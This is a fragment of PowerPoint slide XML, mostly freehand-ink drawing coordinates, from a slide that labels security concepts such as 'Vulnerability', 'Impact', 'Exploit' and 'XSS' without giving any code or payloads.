            </mc:Choice>
            <mc:Fallback xmlns=""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9C8E4168-69D5-4EF9-B15A-BA2AEB1C4A4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89968" y="714194"/>
                    <a:ext cx="349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8E66B253-78CF-426F-BBCD-6D8C0CDC7C23}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1460888" y="838394"/>
                  <a:ext cx="109440" cy="114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09ECF8A4-8D1D-4BC3-BEF3-9BDAA8FF274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52248" y="829754"/>
                    <a:ext cx="1270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18AF9096-0301-4CB1-A9E8-0681BDB75A25}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1565288" y="845954"/>
                  <a:ext cx="29160" cy="979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8F93437B-F85D-4125-9687-30B1E3B75B3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556288" y="837314"/>
                    <a:ext cx="468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D4C573B5-D355-4888-93FD-13CE773DD37C}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1608488" y="816794"/>
                  <a:ext cx="86040" cy="11196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84E64A6B-6FB7-43DE-80E0-65255AB3A23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599848" y="808154"/>
                    <a:ext cx="1036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9BA22D1C-DA48-4AD6-B35E-BDE8EBAC2458}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1729088" y="749114"/>
                  <a:ext cx="19080" cy="177840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="37" name="Freihand 36">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61834A8-3C09-45B1-8F64-F7BD144E33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0088" y="740474"/>
                    <a:ext cx="367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5046F34-AB03-407D-ACFE-A9BE9B0D4D6F}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1747808" y="803834"/>
                  <a:ext cx="59040" cy="12132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88D57B-0D40-4506-BAAB-43F8EFF1791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38808" y="794834"/>
                    <a:ext cx="766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0246770D-FC90-415E-ADD4-01821FE77D45}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1821968" y="812474"/>
                  <a:ext cx="93600" cy="11160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8C06193-57BE-4019-A4DF-25421FFD40E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12968" y="803834"/>
                    <a:ext cx="111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B32F8C8-B476-446C-ADAA-493F8C479FD9}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1953728" y="836594"/>
                  <a:ext cx="31680" cy="1076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F475C2A7-DEE6-48C4-8194-9406A151CC4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45088" y="827594"/>
                    <a:ext cx="493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38376E0-E5E5-45AE-8420-F43EE8E8477A}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1938608" y="751634"/>
                  <a:ext cx="4320" cy="118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797DE076-AC42-4D1D-94B1-3F086177FB4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929608" y="742994"/>
                    <a:ext cx="219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E77F98BA-76C7-493D-891B-349FD0EBEB82}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2019608" y="835154"/>
                  <a:ext cx="97200" cy="8928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616627CC-73E0-4CB2-8533-84B697FF8B5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010968" y="826154"/>
                    <a:ext cx="114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2E085404-5C04-4A2B-B64D-B9DC7338E39C}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2131568" y="742634"/>
                  <a:ext cx="17280" cy="1836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9849DAD0-18DC-4394-9FBF-2B0D187642F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22928" y="733994"/>
                    <a:ext cx="349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501CF93-3C6F-40A4-A21F-34699DE39470}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2175128" y="831914"/>
                  <a:ext cx="89640" cy="8136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6DFB1F97-AB0F-423E-BD04-196C3D196E0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166128" y="823274"/>
                    <a:ext cx="1072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95E0EF96-9BDD-4544-81DD-13856536C6AE}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2296808" y="902114"/>
                  <a:ext cx="10440" cy="540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6DB4AFCE-254A-49A8-AA5D-CFF78F94A35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288168" y="893114"/>
                    <a:ext cx="280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9B67ADB9-E23E-4217-8C13-25877BE929C4}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2353328" y="810314"/>
                  <a:ext cx="108360" cy="10908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0E77E990-208C-4857-B2CA-ECAF050427F2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44688" y="801674"/>
                    <a:ext cx="126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AB78F58A-35BA-452B-8770-898424EB8F7F}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2498408" y="810314"/>
                  <a:ext cx="103680" cy="97920"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns=""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B8DD2A25-0767-4B5D-B361-51B1581E9B9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489768" y="801314"/>
                    <a:ext cx="12132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B825D0CE-8EE1-413E-A7B6-EFCBED9287CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="812335" y="995367"/>
              <a:ext cx="1361520" cy="318240"/>
              <a:chOff x="3729526" y="1005434"/>
              <a:chExt cx="1361520" cy="318240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E1E8174-2710-4D91-A4D8-9AFF47E38E2A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3729526" y="1005434"/>
                <a:ext cx="1055520" cy="318240"/>
                <a:chOff x="3729526" y="1005434"/>
                <a:chExt cx="1055520" cy="31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9526" y="1005434"/>
                    <a:ext cx="229320" cy="318240"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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3720526" y="996434"/>
                      <a:ext cx="246960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75966" y="1163834"/>
                    <a:ext cx="100440" cy="15840"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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3767326" y="1154834"/>
                      <a:ext cx="118080" cy="3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9326" y="1006874"/>
                    <a:ext cx="21600" cy="299160"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4010686" y="997874"/>
                      <a:ext cx="39240" cy="31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73966" y="1096154"/>
                    <a:ext cx="119160" cy="12960"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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964966" y="1087514"/>
                      <a:ext cx="136800" cy="3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9526" y="1013354"/>
                    <a:ext cx="37440" cy="297000"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4170526" y="1004354"/>
                      <a:ext cx="550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94206" y="1089674"/>
                    <a:ext cx="177480" cy="33120"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4085206" y="1080674"/>
                      <a:ext cx="19512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4726" y="1167794"/>
                    <a:ext cx="118080" cy="118080"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4286086" y="1158794"/>
                      <a:ext cx="13572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23966" y="1165634"/>
                    <a:ext cx="57240" cy="108360"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4414966" y="1156994"/>
                      <a:ext cx="7488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5926" y="1176794"/>
                    <a:ext cx="124920" cy="109080"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4526926" y="1168154"/>
                      <a:ext cx="14256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2006" y="1061234"/>
                    <a:ext cx="24120" cy="229320"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4663366" y="1052594"/>
                      <a:ext cx="41760" cy="24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06926" y="1144034"/>
                    <a:ext cx="78120" cy="140040"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4697926" y="1135394"/>
                      <a:ext cx="95760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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4830766" y="1146554"/>
                  <a:ext cx="120960" cy="11592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822126" y="1137554"/>
                    <a:ext cx="13860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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4994566" y="1115954"/>
                  <a:ext cx="96480" cy="1630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985926" y="1106954"/>
                    <a:ext cx="11412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2D00B66-3C9C-4F21-9A79-2112801EDF94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="688966" y="840914"/>
              <a:ext cx="1555200" cy="87840"/>
              <a:chOff x="688966" y="840914"/>
              <a:chExt cx="1555200" cy="8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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="688966" y="914354"/>
                  <a:ext cx="91440" cy="144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79966" y="905354"/>
                    <a:ext cx="10908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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="889846" y="886274"/>
                  <a:ext cx="97200" cy="1368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81206" y="877634"/>
                    <a:ext cx="114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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1107286" y="886994"/>
                  <a:ext cx="109080" cy="1296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98286" y="878354"/>
                    <a:ext cx="126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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1324366" y="876914"/>
                  <a:ext cx="93600" cy="1044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15726" y="867914"/>
                    <a:ext cx="11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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1533886" y="882314"/>
                  <a:ext cx="93600" cy="90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524886" y="873674"/>
                    <a:ext cx="1112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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1716046" y="878714"/>
                  <a:ext cx="116640" cy="57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707406" y="870074"/>
                    <a:ext cx="13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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1964446" y="857114"/>
                  <a:ext cx="87840" cy="864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955806" y="848474"/>
                    <a:ext cx="1054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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2154526" y="840914"/>
                  <a:ext cx="89640" cy="1548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145886" y="831914"/>
                    <a:ext cx="10728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A2667DA-1D0B-4736-91E9-C9DC245888FF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BBCA3EFC-F2B5-42B0-9949-D43006EE228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B81C4DA9-136E-46C3-A3F0-B8C6C8DAC68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5A3802D-697F-4F8B-A476-E55C74D1CD37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8A1CD34-CC25-4F15-87DB-7FACEA8C5BF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583C8456-5B00-4034-A6C8-3FBA2143F17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34BBCCB0-CBCC-405C-BC8C-8A2C9B902D9E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BBD9F313-DF82-4312-9B46-B2F844935EB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D4304B06-450B-46A9-9AE3-FDC548E6B226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7802B83-3074-4DF2-81F1-E9E16F1E45B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571C1EF-94F3-4183-ABE1-E22628A2CE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086AD85D-A484-45F4-AB7C-032EC876B82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B6473CC8-DA6A-40B5-963E-1CC1F2E957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0804778E-0B2E-400D-8AE3-45B4685E2BD3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8EFD220-4219-466A-839C-7F271210422F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1D2F212D-031B-4156-AEEE-46E159A2626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03A127A-3C1F-4CCF-A522-4F0CD6AD130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B051F1B6-8119-4B16-AACF-553D67C24C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BA88B18C-04FD-4C9D-896F-1727EB892E4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858AB5DD-D9A8-47E0-B345-76CDA57C5F4C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7ED851-5B73-4766-882E-C8C37C6BC7B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51A612FD-57EE-4D98-913E-1B6C23FB26B6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7916D1A2-F1C5-45D8-95B0-DE23951564B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21D75CC5-1E48-48F8-B234-9018A38E1BD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9480245B-8A91-4863-BB1B-3CB7337B823B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E4504C9-A1D0-4EB3-9ED6-DD5168D4043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B4DA493-72A3-410E-9AC1-49594BB1C12D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AABE017-CEF5-4512-A009-23B4482A02BD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69D103B-06A7-4EE0-A767-2624CC701B5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1078580-5FF5-414E-B639-1A7F42CC8FF6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37BE4153-B593-4825-A1BA-F435F895606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5269D2B6-5480-4E38-A7B5-EC24A9642B4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A1F6BD4D-91DB-4ADA-AF53-95B9C4C73A5E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8A1EA4CD-D130-4C70-B1F4-4394F1D2F86B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D2BDCB6A-9BA9-4CF5-9423-AB0ACE1D1F1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28774F24-3F73-4150-9B7A-C39560B31D70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E1FA404D-2C3B-46A4-8821-E9D5ACD6806F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0AB5A588-4827-4226-B7F3-FF87F2CD9A1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B060D84E-942D-4EA3-9596-E5037D79E6A3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52" name="Freihand 151">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4063F82-0065-48E4-AF00-0EE47FF4904E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53" name="Freihand 152">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D0DC01E-4FED-48D4-AB08-344DC5B0892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E7D38EF3-1DAC-4DD6-A409-A9B9CDB4B490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DDBD0400-3885-4E69-AD13-2C7DAEF8D8D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D9116B87-0066-4D46-A1BC-E2F0E8E8F98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4E41B52F-580D-4C8C-B7A3-3665A2B6361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7CF079E4-1E21-498E-8EFD-F2F62723981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2D2533E-B2DA-4631-AD15-77A50FDE64A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64FAF5DD-D5D8-4380-BA87-4C0D936E0B89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61" name="Grafik 160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650E71EB-FD4C-4EE0-943A-FB4FB1782AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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>
            <a:off x="6991057" y="3762072"/>
            <a:ext cx="4928089" cy="1215546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Textfeld 161">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56DE9CAD-A77E-4E81-B414-B874F9C12F0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135658" y="5396058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Vulnerability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B2A75D5-E2E1-4848-B9B1-296933BD18BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8952784" y="6106885"/>
            <a:ext cx="162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Impact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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="9199366" y="5412194"/>
              <a:ext cx="4320" cy="46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90366" y="5403554"/>
                <a:ext cx="21960" cy="2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09698C-E8AF-4CD9-A12F-A6CF49FD3F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="162" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9707640" y="4724400"/>
            <a:ext cx="2" cy="671658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A15215E6-D52A-4822-AE03-F3199613A06C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="163" idx="1"/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5724508" y="5183276"/>
            <a:ext cx="3228276" cy="1215997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7C6C7B88-86B7-44C3-954C-2D94B3F17D7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2928664" y="617129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Exploit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7E277E2-3F3B-4421-A660-AC8322371887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="165" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2329876" y="899954"/>
            <a:ext cx="598788" cy="9563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C639-4E4E-4141-AF0F-7A4C0A5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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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05965994-66C4-4C20-A1DB-ACC1EF70C7B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9404141" y="1608127"/>
            <a:ext cx="1824994" cy="1001160"/>
            <a:chOff x="1165452" y="1554434"/>
            <a:chExt cx="1824994" cy="10011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28CCE68-BEA7-4907-9E7D-EF8CB5D4E3E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2604526" y="1554434"/>
              <a:ext cx="385920" cy="374040"/>
              <a:chOff x="2604526" y="1554434"/>
              <a:chExt cx="3859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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2634406" y="1674314"/>
                  <a:ext cx="262440" cy="254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25406" y="1665314"/>
                    <a:ext cx="2800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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2724766" y="1755314"/>
                  <a:ext cx="8280" cy="6840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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16126" y="1746314"/>
                    <a:ext cx="2592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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2798566" y="1763954"/>
                  <a:ext cx="19800" cy="2952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789566" y="1754954"/>
                    <a:ext cx="374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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2740246" y="1809674"/>
                  <a:ext cx="15840" cy="39600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns=""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31606" y="1801034"/>
                    <a:ext cx="334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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2674366" y="1870874"/>
                  <a:ext cx="74160" cy="183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665366" y="1861874"/>
                    <a:ext cx="918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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2604526" y="1646594"/>
                  <a:ext cx="385920" cy="5472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95886" y="1637594"/>
                    <a:ext cx="4035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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2697766" y="1554434"/>
                  <a:ext cx="214200" cy="12456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88766" y="1545794"/>
                    <a:ext cx="23184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9B1D42FA-146B-4B07-A516-565CCA46E322}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2532166" y="1942874"/>
              <a:ext cx="371520" cy="612720"/>
              <a:chOff x="2532166" y="1942874"/>
              <a:chExt cx="371520" cy="61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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2643406" y="1942874"/>
                  <a:ext cx="75240" cy="47592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34406" y="1933874"/>
                    <a:ext cx="92880" cy="49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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2532166" y="2379194"/>
                  <a:ext cx="131040" cy="17640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23166" y="2370554"/>
                    <a:ext cx="1486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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2670406" y="2394674"/>
                  <a:ext cx="162000" cy="147240"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns=""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1766" y="2385674"/>
                    <a:ext cx="179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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2554126" y="2089034"/>
                  <a:ext cx="120600" cy="11448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45126" y="2080394"/>
                    <a:ext cx="138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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2709286" y="2049794"/>
                  <a:ext cx="194400" cy="1540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00286" y="2040794"/>
                    <a:ext cx="212040" cy="171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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2043740" y="1917214"/>
                <a:ext cx="392040" cy="276120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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4740" y="1908574"/>
                  <a:ext cx="409680" cy="293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8" name="Gruppieren 1037">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372EC0FC-DC80-4021-8178-1503278097E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1165452" y="1818119"/>
              <a:ext cx="756360" cy="493560"/>
              <a:chOff x="1002886" y="1786634"/>
              <a:chExt cx="756360" cy="49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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1002886" y="1786634"/>
                  <a:ext cx="67320" cy="483840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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93886" y="1777994"/>
                    <a:ext cx="84960" cy="50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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1037086" y="1794554"/>
                  <a:ext cx="567000" cy="399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28086" y="1785554"/>
                    <a:ext cx="5846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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1029526" y="2200274"/>
                  <a:ext cx="723600" cy="7992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20886" y="2191634"/>
                    <a:ext cx="7412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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1580326" y="1794554"/>
                  <a:ext cx="178920" cy="408600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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571686" y="1785554"/>
                    <a:ext cx="196560" cy="42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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1122766" y="1883834"/>
                  <a:ext cx="70560" cy="74520"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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113766" y="1875194"/>
                    <a:ext cx="882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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1235806" y="1897154"/>
                  <a:ext cx="92880" cy="55440"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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27166" y="1888154"/>
                    <a:ext cx="1105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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1363246" y="1887794"/>
                  <a:ext cx="306720" cy="85680"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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4246" y="1879154"/>
                    <a:ext cx="32436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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1378726" y="1885994"/>
                  <a:ext cx="291600" cy="51480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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9726" y="1876994"/>
                    <a:ext cx="3092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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7566640" y="1741758"/>
              <a:ext cx="1633680" cy="185400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p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57640" y="1732775"/>
                <a:ext cx="1651320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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7554040" y="1759038"/>
              <a:ext cx="213840" cy="232560"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p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45055" y="1750038"/>
                <a:ext cx="23145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B1654B-EB5B-4F60-8E83-1BAC18D5E629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="176866">
            <a:off x="7721800" y="1338558"/>
            <a:ext cx="1788480" cy="311400"/>
            <a:chOff x="7364446" y="2557754"/>
            <a:chExt cx="17884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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
